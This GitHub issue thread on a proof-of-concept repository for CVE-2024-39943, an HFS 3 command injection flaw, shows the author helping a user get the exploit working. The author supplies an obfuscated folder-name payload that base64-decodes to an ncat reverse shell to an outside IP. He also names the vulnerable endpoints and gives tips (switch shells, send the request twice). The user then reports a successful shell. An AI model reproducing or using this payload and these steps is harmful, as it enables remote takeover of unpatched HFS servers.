truonghuuphuc / CVE-2024-39943-Poc

CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

Failed to bypass single quotes in mkdir '' #1

Closed ghost closed 3 months ago

ghost commented 3 months ago

First of all, hello, and thank you very much for your POC. But there is no response when verifying through your POC. Through my packet capture test, I found that the payload you provided cannot bypass the single quotes in the mkdir '' method of the ~/api/create_folder API address. The final data returned by the GET request is:

data: [["e","ENOTDIR",null]]

data:

I hope you can test it again.

truonghuuphuc commented 3 months ago

Example payload: payload: poc";python3 -c "import os;import base64;os.system(base64.b64decode('bmNhdCAxOTIuMTkyLjEwMS4xIDQ0NDQgLWUgL2Jpbi9iYXNo'))

I use the endpoint ~/api/create_folder to create a folder with the payload as its name. Then the endpoint ~/api/get_ls?path={{name folder }} executes the command df.
Reference: https://github1s.com/rejetto/hfs/blob/v0.52.9/src/util-os.ts#L10
Reference: https://github.com/rejetto/hfs/compare/v0.52.9...v0.52.10

Thanks

ghost commented 3 months ago

Yes, I understand what you mean, and I have seen the error in the server log, such as: /bin/bash -c error: df /k '"poc;xxxxx". But I still can't bounce the shell back to my VPS.

I would like to confirm the following information with you:

  1. Is the POC you uploaded consistent with the one in the video?
  2. Is the source code of your HFS 3 the same as the hfs-linux.zip file in the GitHub project you uploaded?
  3. What is the version of your Linux environment?

Thanks for your answer, which will help me solve the current problem. Thank you!

truonghuuphuc commented 3 months ago

Check

  1. You should check that /bin/bash exists.
  2. Try changing /bin/bash to /bin/sh.

Confirm

  1. Is the POC you uploaded consistent with the one in the video?
    • Yes
  2. Is the source code of your HFS 3 the same as the hfs-linux.zip file in the GitHub project you uploaded?
    • Yes
  3. What is the version of your Linux environment?
    • I use docker image kalilinux/kali-rolling:latest

Poc: user admin

https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/c9e3d7ec-9181-43b5-8230-82c36fbf8a2b

Update 6/7/2024: Poc user guest

https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/f5e0c190-419a-4017-83ab-8a303b7176a8

Note: the payload is the name of an existing directory. If the directory does not exist, you need to send the request twice. In the video, because a directory whose name contains the payload already exists on the HFS server, I only need to send the request once.

https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/8bc8c270-24a5-4ad6-b32b-a75243afcd6a

ghost commented 3 months ago

Thanks for your answer, I will try again your way! Thank you for your help.

ghost commented 3 months ago

I reproduced it successfully! Thanks for your help! I cannot execute the payload at the endpoint /~/api/get_ls?path=, but I succeeded through the PUT method in your video! Thank you very much for helping me! Thanks!